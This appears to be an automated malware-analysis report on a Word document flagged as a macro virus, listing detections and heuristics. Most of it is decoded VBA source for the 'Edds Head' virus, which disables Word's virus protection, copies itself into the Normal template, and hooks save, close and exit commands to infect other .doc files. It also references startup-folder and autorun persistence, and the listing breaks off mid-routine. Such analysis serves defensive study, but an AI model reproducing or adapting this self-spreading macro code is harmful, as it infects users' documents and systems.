Verdict: MALICIOUS
Risk Score: 300
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The script attempts to establish persistence by writing to the startup folder with the path 'c:\windows\startm~1\programs\startup\msfile.bat'. The presence of legacy macro virus markers and ClamAV detections further support its malicious nature.
Heuristics (6)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27884 bytes |

SHA-256: 1b666d4031caa201b8bb5af72877b7d3ebc040341777411d13b4ac69d929a907
Detection (ClamAV): Doc.Trojan.VMPCK1-14
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EddsHead"
Public Skip As Integer
Sub EddsHead()
'Produced by,
'The VicodinES Macro.Poppy Construction Kit v1.0b
'================================================
'Code Written by VicodinES "Live for Now"
'Poppy ID : 24421479963
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
ActiveDocument.ReadOnlyRecommended = False
rm = Int(Rnd * 100)
If rm = 99 Then MsgBox "Your Computer Has The Edds Head Virus", vbSystemModal
If Month(Now()) = 2 And Day(Now()) = 14 Then MsgBox "I Hope You Got Your Girlfriend Something Nice !", vbInformation, "Birthday Greeting!!!"
With Dialogs(wdDialogFileSummaryInfo)
.Author = "England Rules...."
.Title = "England Rules...."
.Subject = "England Rules...."
.Comments = "England Rules...."
.Keywords = "England Rules...."
.Execute
End With
z147924429 = 0
Set Unit1872442147913 = MacroContainer
f6002$ = "c:\windows\startm~1\programs\startup\msfile.bat"
d41842442 = GetAttr(NormalTemplate.FullName)
If d41842442 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f6002$)
If d41842442 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f6002$)
If d41842442 = vbReadOnly Then GoTo fuckoff
If d41842442 = vbReadOnly + vbArchive Then GoTo fuckoff
If Unit1872442147913 = NormalTemplate Then z147924429 = 1
If z147924429 = 1 Then OJSimpsonISaMurder14794 = NormalTemplate.FullName Else OJSimpsonISaMurder14794 = ActiveDocument.FullName
If z147924429 = 1 Then vfr244211 = ActiveDocument.FullName Else vfr244211 = NormalTemplate.FullName
Application.OrganizerCopy Source:=OJSimpsonISaMurder14794, Destination:=vfr244211, Name:="EddsHead", Object:=wdOrganizerObjectProjectItems
If z147924429 = 1 And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If z147924429 = 0 Then
If NormalTemplate.Saved = False Then NormalTemplate.Save
End If
Call dhIconDisco("C:\autorun.inf")
'VMPCK v1.0b
fuckoff:
End Sub
Sub HelpAbout()
On Error Resume Next
MsgBox "Edds Head Virii", vbInformation
End Sub
Sub FileNew()
On Error Resume Next
Call EddsHead
Dialogs(wdDialogFileNew).Show
Skip = 1
Call EddsHead
End Sub
Sub FileSave()
On Error Resume Next
Call EddsHead
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call EddsHead
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub ToolsOptions()
On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
Call EddsHead
End Sub
Sub EditFind()
On Error Resume Next
Dialogs(wdDialogEditFind).Show
Call EddsHead
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call EddsHead
End Sub
Sub FilePrint()
On Error Resume Next
Dialogs(wdDialogFilePrint).Show
Call EddsHead
End Sub
Sub FileExit()
On Error Resume Next
Call EddsHead
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call EddsHead
Do While (fName <> "")
fName = Dir()
... (truncated)